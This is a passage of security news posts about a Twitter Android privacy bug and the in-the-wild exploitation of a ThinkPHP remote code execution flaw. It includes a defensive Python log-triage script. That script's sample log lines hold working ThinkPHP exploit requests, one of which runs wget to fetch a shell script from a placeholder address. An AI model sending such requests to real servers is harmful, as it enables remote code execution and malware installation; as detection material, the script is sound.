Twitter has notified impacted users and has turned “Protect your Tweets” back on for them if it was disabled.

“We are providing this broader notice through the Twitter Help Center since we can’t confirm every account that may have been impacted. We encourage you to review your privacy settings to ensure that your ‘Protect your Tweets’ setting reflects your preferences,” continues the advisory.

Twitter recently addressed a similar bug: in December, the researcher Terence Eden discovered that the permissions dialog shown when authorizing certain apps to Twitter could expose direct messages to the third party.

In September 2018, the company announced that an issue in the Twitter Account Activity API had exposed some users’ direct messages (DMs) and protected tweets to the wrong developers.

Twitter is considered one of the most powerful social media platforms; it has been used in multiple cases by nation-state actors as a vector for disinformation and propaganda.

In December Twitter discovered a possible nation-state attack while it was investigating an information disclosure flaw affecting its platform.

Pierluigi Paganini

(SecurityAffairs – Twitter app, Android)

The post Twitter fixed a bug in its Android App that exposed Protected Tweets appeared first on Security Affairs.

Threat actors in the wild are leveraging a recently discovered flaw in the ThinkPHP PHP framework to install cryptominers, skimmers, and other malware.

Multiple threat actors are leveraging a recently discovered code execution vulnerability (CVE-2018-20062) in the ThinkPHP framework.

The flaw was already addressed by TopThink, the Chinese firm that designed the framework, but security expert Larry Cashdollar of Akamai’s Security Incident Response Team has now discovered active exploitation of the flaw in the wild.

Cashdollar was investigating a recent Magecart campaign when he discovered a new strain of malware.

“While investigating the recent Magecart card skimming attacks, I came across a payload I was not familiar with. Further research into it led me to discover that in December a researcher disclosed a remote command execution vulnerability in ThinkPHP, a web framework by TopThink.” reads the analysis published by the expert.

“The developers fixed the vulnerability, stating that because ‘the framework does not detect the controller name enough, it may lead to possible getshell vulnerabilities without the forced routing enabled.’”

Multiple attackers are using relatively simple techniques to trigger the issue; according to Cashdollar, a single line of code is enough to scan for the flaw.

Once the flaw is found, attackers can use publicly available code to exploit it and install several malicious payloads. Cashdollar said that in one case threat actors exploited the flaw to deliver a variant of the Mirai bot.

“There are multiple actors abusing this flaw to install everything from a Mirai like botnet to Microsoft Windows malware. ” continues the post.

The analysis of samples from the last seven days revealed that the majority of attacking IP addresses are in the Asia-Pacific region, where the ThinkPHP framework is most popular.
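Cashdollar's point that the exploit is a single line and that attack traffic arrives from many sources can be checked in an ordinary web server access log. The block below is an added example, not Akamai's code: it parses combined-format log lines, flags requests carrying the public CVE-2018-20062 invocation chain (the namespaced \think\ class path and invokefunction / call_user_func_array in the routing parameters, which is an assumption taken from public exploit write-ups rather than from the article), decodes what the attacker asked the server to run, and counts attempts per source IP. The log lines are constructed and use documentation addresses.

```python
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx combined log format, enough fields for triage.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers of the public CVE-2018-20062 exploit traffic: a namespaced class path in the
# routing parameter and the invokefunction/call_user_func_array chain. Assumption: these
# come from public exploit write-ups, not from the Akamai post quoted above.
INVOKE_RE = re.compile(r"\\think\\|invokefunction|call_user_func_array", re.IGNORECASE)

# Constructed sample log lines (RFC 5737 addresses); the third and fourth are benign.
SAMPLE_LOG = [
    r'203.0.113.5 - - [15/Jan/2019:10:02:11 +0000] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=probe HTTP/1.1" 200 512 "-" "python-requests/2.21"',
    r'198.51.100.7 - - [15/Jan/2019:10:03:40 +0000] "GET /index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://198.51.100.7/x.sh HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    r'192.0.2.9 - - [15/Jan/2019:10:04:02 +0000] "GET /index.php?s=/index/user/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    r'192.0.2.9 - - [15/Jan/2019:10:04:03 +0000] "GET /static/app.js HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]


def thinkphp_rce_indicator(target: str) -> Optional[Dict[str, object]]:
    """Return the called function and its arguments if a request target matches the exploit chain."""
    if not INVOKE_RE.search(unquote(target)):  # match raw and percent-encoded forms alike
        return None
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {
        "function": qs.get("function", [""])[0],
        "vars": [v for key in sorted(qs) if key.startswith("vars[") for v in qs[key]],
    }


def triage(lines: List[str]) -> Dict[str, object]:
    """Flag exploit attempts, keep the decoded command, and count attempts per source IP."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        indicator = thinkphp_rce_indicator(m["target"])
        if indicator:
            hits.append({"ip": m["ip"], "status": int(m["status"]), **indicator})
    return {"hits": hits, "by_ip": Counter(h["ip"] for h in hits)}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for hit in result["hits"]:
        print(hit["ip"], hit["status"], hit["function"], hit["vars"])
    print(dict(result["by_ip"]))
```

The decoded vars list is what distinguishes a scanner probe (a harmless function such as md5 with a marker string) from an actual compromise attempt (system with a download command); the status code tells you whether the server accepted the request.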


Cashdollar confirmed that threat actors are actively scanning systems across the world.

To secure your system, update the framework to the current version.

“There is so much attack traffic, and so many ways to hide, criminals no longer worry about the tracks they’ve left behind. The goal now is to get command execution as any user, on any type of system, to either spread a botnet, distribute malware, or mine cryptocurrency.” concludes the expert.

“We will see more cross-pollination of command execution vulnerabilities in web apps, enterprise software, and IoT devices being used against multiple target platforms.”

Pierluigi Paganini

(SecurityAffairs – hacking, ThinkPHP)

The post Attacks in the wild leverage flaw in ThinkPHP Framework appeared first on Security Affairs.